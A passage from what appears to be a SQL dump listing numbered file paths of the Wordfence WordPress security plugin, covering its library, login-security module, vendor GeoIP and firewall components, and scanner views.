dfence/lib/email_unlockRequest.php'),(2220,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(2221,'wp-content/plugins/wordfence/lib/flags.php'),(2222,'wp-content/plugins/wordfence/lib/live_activity.php'),(2223,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(2224,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(2225,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(2226,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(2227,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(2228,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(2229,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(2230,'wp-content/plugins/wordfence/lib/menu_options.php'),(2231,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(2232,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(2233,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(2234,'wp-content/plugins/wordfence/lib/menu_support.php'),(2235,'wp-content/plugins/wordfence/lib/menu_tools.php'),(2236,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(2237,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(2238,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(2239,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(2240,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(2241,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(2242,'wp-content/plugins/wordfence/lib/noc1.key'),(2243,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(2244,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(2245,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(2246,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(2247,'wp-content/plugins/wordfence/lib/sysinfo.php'),(2248,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(2249,'wp-content/plugins/wordfence/lib/wf503.php'),(2250,'wp-content/plugins/wordfence/lib/wfAPI.php'),(2251,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(2252,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(2253,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(2254,'wp-content/plugins/wordfence/lib/wfArray.php'),(2255,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(2256,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(2257,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(2258,'wp-content/plugins/wordfence/lib/wfCache.php'),(2259,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(2260,'wp-content/plugins/wordfence/lib/wfConfig.php'),(2261,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(2262,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(2263,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(2264,'wp-content/plugins/wordfence/lib/wfDB.php'),(2265,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(2266,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(2267,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(2268,'wp-content/plugins/wordfence/lib/wfDict.php'),(2269,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(2270,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(2271,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(2272,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(2273,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(2274,'wp-content/plugins/wordfence/lib/wfIssues.php'),(2275,'wp-content/plugins/wordfence/lib/wfJWT.php'),(2276,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(2277,'wp-content/plugins/wordfence/lib/wfLog.php'),(2278,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(2279,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(2280,'wp-content/plugins/wordfence/lib/wfNotification.php'),(2281,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(2282,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(2283,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(2284,'wp-content/plugins/wordfence/lib/wfScan.php'),(2285,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(2286,'wp-content/plugins/wordfence/lib/wfSchema.php'),(2287,'wp-content/plugins/wordfence/lib/wfStyle.php'),(2288,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(2289,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(2290,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(2291,'wp-content/plugins/wordfence/lib/wfUtils.php'),(2292,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(2293,'wp-content/plugins/wordfence/lib/wfView.php'),(2294,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(2295,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(2296,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(2297,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(2298,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(2299,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(2300,'wp-content/plugins/wordfence/models/.htaccess'),(2301,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(2302,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(2303,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(2304,'wp-content/plugins/wordfence/models/common/wfTab.php'),(2305,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(2306,'wp-content/plugins/wordfence/models/page/wfPage.php'),(2307,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(2308,'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess'),(2309,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(2310,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(2311,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(2312,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(2313,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(2314,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(2315,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(2316,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(2317,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(2318,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(2319,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(2320,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(2321,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(2322,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(2323,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(2324,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(2325,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(2326,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(2327,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(2328,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(2329,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(2330,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(2331,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(2332,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(2333,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(2334,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(2335,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(2336,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(2337,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(2338,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(2339,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(2340,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css'),(2341,'wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css'),(2342,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css'),(2343,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css'),(2344,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css'),(2345,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css'),(2346,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css'),(2347,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css'),(2348,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css'),(2349,'wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css'),(2350,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(2351,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(2352,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(2353,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(2354,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(2355,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(2356,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(2357,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(2358,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(2359,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(2360,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(2361,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js'),(2362,'wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js'),(2363,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js'),(2364,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js'),(2365,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js'),(2366,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js'),(2367,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js'),(2368,'wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js'),(2369,'wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(2370,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(2371,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(2372,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(2373,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(2374,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(2375,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(2376,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(2377,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(2378,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(2379,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(2380,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(2381,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(2382,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(2383,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(2384,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(2385,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(2386,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(2387,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(2388,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(2389,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(2390,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(2391,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(2392,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(2393,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(2394,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(2395,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(2396,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(2397,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(2398,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(2399,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(2400,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(2401,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(2402,'wp-content/plugins/wordfence/readme.txt'),(2403,'wp-content/plugins/wordfence/tmp/.htaccess'),(2404,'wp-content/plugins/wordfence/vendor/.htaccess'),(2405,'wp-content/plugins/wordfence/vendor/autoload.php'),(2406,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(2407,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(2408,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(2409,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(2410,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(2411,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(2412,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(2413,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(2414,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(2415,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(2416,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(2417,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(2418,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(2419,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(2420,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(2421,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(2422,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(2423,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(2424,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(2425,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(2426,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(2427,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(2428,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(2429,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(2430,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(2431,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(2432,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(2433,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(2434,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(2435,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(2436,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(2437,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(2438,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(2439,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(2440,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(2441,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(2442,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(2443,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(2444,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(2445,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(2446,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(2447,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(2448,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(2449,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(2450,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(2451,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(2452,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(2453,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(2454,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(2455,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(2456,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(2457,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(2458,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(2459,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(2460,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(2461,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(2462,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(2463,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(2464,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(2465,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(2466,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(2467,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(2468,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(2469,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(2470,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(2471,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(2472,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(2473,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(2474,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(2475,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(2476,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(2477,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(2478,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(2479,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(2480,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(2481,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(2482,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(2483,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(2484,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(2485,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(2486,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(2487,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(2488,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(2489,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(2490,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(2491,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(2492,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(2493,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(2494,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(2495,'wp-content/plugins/wordfence/views/.htaccess'),(2496,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(2497,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(2498,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(2499,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(2500,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(2501,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(2502,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(2503,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(2504,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(2505,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(2506,'wp-content/plugins/wordfence/views/common/license.php'),(2507,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(2508,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(2509,'wp-content/plugins/wordfence/views/common/page-help.php'),(2510,'wp-content/plugins/wordfence/views/common/page-tabbar.php'),(2511,'wp-content/plugins/wordfence/views/common/page-title.php'),(2512,'wp-content/plugins/wordfence/views/common/section-subtitle.php'),(2513,'wp-content/plugins/wordfence/views/common/section-title.php'),(2514,'wp-content/plugins/wordfence/views/common/status-circular.php'),(2515,'wp-content/plugins/wordfence/views/common/status-critical.php'),(2516,'wp-content/plugins/wordfence/views/common/status-detail.php'),(2517,'wp-content/plugins/wordfence/views/common/status-tooltip.php'),(2518,'wp-content/plugins/wordfence/views/common/status-warning.php'),(2519,'wp-content/plugins/wordfence/views/common/unsubscribe.php'),(2520,'wp-content/plugins/wordfence/views/dashboard/global-status.php'),(2521,'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(2522,'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(2523,'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(2524,'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(2525,'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(2526,'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(2527,'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(2528,'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(2529,'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(2530,'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(2531,'wp-content/plugins/wordfence/views/diagnostics/text.php'),(2532,'wp-content/plugins/wordfence/views/gdpr/banner.php'),(2533,'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(2534,'wp-content/plugins/wordfence/views/onboarding/banner.php'),(2535,'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(2536,'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(2537,'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(2538,'wp-content/plugins/wordfence/views/onboarding/overlay.php'),(2539,'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(2540,'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(2541,'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(2542,'wp-content/plugins/wordfence/views/options/block-controls.php'),(2543,'wp-content/plugins/wordfence/views/options/option-label.php'),(2544,'wp-content/plugins/wordfence/views/options/option-select.php'),(2545,'wp-content/plugins/wordfence/views/options/option-switch.php'),(2546,'wp-content/plugins/wordfence/views/options/option-text.php'),(2547,'wp-content/plugins/wordfence/views/options/option-textarea.php'),(2548,'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),(2549,'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),(2550,'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),(2551,'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),(2552,'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),(2553,'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),(2554,'wp-content/plugins/wordfence/views/options/option-toggled.php'),(2555,'wp-content/plugins/wordfence/views/options/option-token.php'),(2556,'wp-content/plugins/wordfence/views/options/options-title.php'),(2557,'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),(2558,'wp-content/plugins/wordfence/views/reports/activity-report.php'),(2559,'wp-content/plugins/wordfence/views/scanner/issue-base.php'),(2560,'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),(2561,'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),(2562,'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),(2563,'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),(2564,'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),(2565,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),(2566,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),(2567,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),(2568,'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),(2569,'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),(2570,'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),(2571,'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),(2572,'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),(2573,'wp-content/plugins/wordfence/views/scanner/issue-database.php'),(2574,'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),(2575,'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),(2576,'wp-content/plugins/wordfence/views/scanner/issue-file.php'),(2577,'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),(2578,'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),(2579,'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),(2580,'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),(2581,'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),(2582,'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),(2583,'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php'),(2584,'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),(2585,'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),(2586,'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),(2587,'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),(2588,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),(2589,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),(2590,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),(2591,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),(2592,'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),(2593,'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),(2594,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),(2595,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),(2596,'wp-content/plugins/wordfence/views/scanner/no-issues.php'),(2597,'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),(2598,'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),(2599,'wp-content/plugins/wordfence/views/scanner/options-group-basic.php'),(2600,'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),(2601,'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),(2602,'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),(2603,'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),(2604,'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),(2605,'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),(2606,'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),(2607,'wp-content/plugins/wordfence/views/scanner/scan-results.php'),(2608,'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),(2609,'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),(2610,